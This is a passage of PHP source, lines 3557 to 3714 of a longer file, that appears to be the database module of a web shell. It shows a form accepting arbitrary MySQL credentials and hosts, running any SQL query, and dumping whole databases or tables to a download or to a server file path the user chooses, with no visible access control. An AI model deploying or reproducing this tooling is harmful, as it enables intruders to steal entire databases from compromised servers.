3557if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
3558else
3559{
3560echo($dump_file);
3561ob_flush();
3562}
3563$dump_file='';
3564}
3565}
3566mysql_free_result($result2);
3567}
3568}
3569mysql_free_result($result);
3570if($archive!='none')
3571{
3572$dump_file=gzencode($dump_file);
3573header('Content-Length: '.strlen($dump_file)."\n");
3574echo($dump_file);
3575}
3576else if($t_f)
3577{
3578fclose($t_f);
3579echo('Dump for '.$db_dump.' now in '.$to_file);
3580}
3581}
3582else
3583{
3584$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
3585if(!$result2)echo('error table '.$table_dump);
3586else
3587{
3588if(!$to_file)
3589{
3590header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
3591header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
3592}
3593if($to_file===false)
3594{
3595header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
3596header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
3597}
3598$dump_file.="create table `{$table_dump}`(\n";
3599for($j=0;$j<mysql_num_rows($result2)-1;$j++)
3600{
3601$rows2=mysql_fetch_array($result2);
3602$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
3603}
3604$rows2=mysql_fetch_array($result2);
3605$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
3606$type[$j]=$rows2[1];
3607$dump_file.=");\n";
3608mysql_free_result($result2);
3609$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
3610$columns=$j-1;
3611for($j=0;$j<mysql_num_rows($result2);$j++)
3612{
3613$rows2=mysql_fetch_array($result2);
3614$dump_file.='insert into `'.$table_dump.'` values (';
3615for($k=0;$k<$columns;$k++)
3616{
3617$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
3618}
3619$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
3620if($archive=='none')
3621{
3622if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
3623else
3624{
3625echo($dump_file);
3626ob_flush();
3627}
3628$dump_file='';
3629}
3630}
3631mysql_free_result($result2);
3632if($archive!='none')
3633{
3634$dump_file=gzencode($dump_file);
3635header('Content-Length: '.strlen($dump_file)."\n");
3636echo $dump_file;
3637}else if($t_f)
3638{
3639fclose($t_f);
3640echo('Dump for '.$db_dump.' now in '.$to_file);
3641}
3642}
3643}
3644}
3645}
3646break;
3647}
3648case 'query' :
3649{
3650echo($head);
3651?>
3652<hr>
3653<form method=post>
3654<table>
3655<td>
3656<table align=left>
3657<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host'
3658
3659type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
3660<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
3661</table>
3662</td>
3663<td>
3664<table>
3665<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
3666<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
3667<input name='archive' type=radio value='none'>without arch
3668<input name='archive' type=radio value='gzip' checked=true>gzip archive
3669<tr><td><input type=submit name='action' value='dump'></td></tr>
3670<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
3671</table>
3672</td>
3673</table>
3674<input name='page' value='mysql' type=hidden>
3675<input name='action' value='query' type=submit>
3676</form>
3677<hr>
3678<?
3679$mysql_link=@mysql_connect($host,$user,$passwd);
3680if(!($mysql_link)) echo('Connect error');
3681else
3682{
3683if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
3684//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
3685$result=@mysql_query($query,$mysql_link);
3686if(!($result))echo(mysql_error());
3687else
3688{
3689echo("<table valign=top align=left>\n<tr>");
3690for($i=0;$i<mysql_num_fields($result);$i++)
3691echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>');
3692echo("\n</tr>\n");
3693for($i=0;$i<mysql_num_rows($result);$i++)
3694{
3695$rows=mysql_fetch_array($result);
3696echo('<tr valign=top align=left>');
3697for($j=0;$j<mysql_num_fields($result);$j++)
3698{
3699echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
3700}
3701echo("</tr>\n");
3702}
3703echo("</table>\n");
3704}
3705mysql_close($mysql_link);
3706}
3707break;
3708}
3709}
3710break;
3711}
3712}
3713?>
3714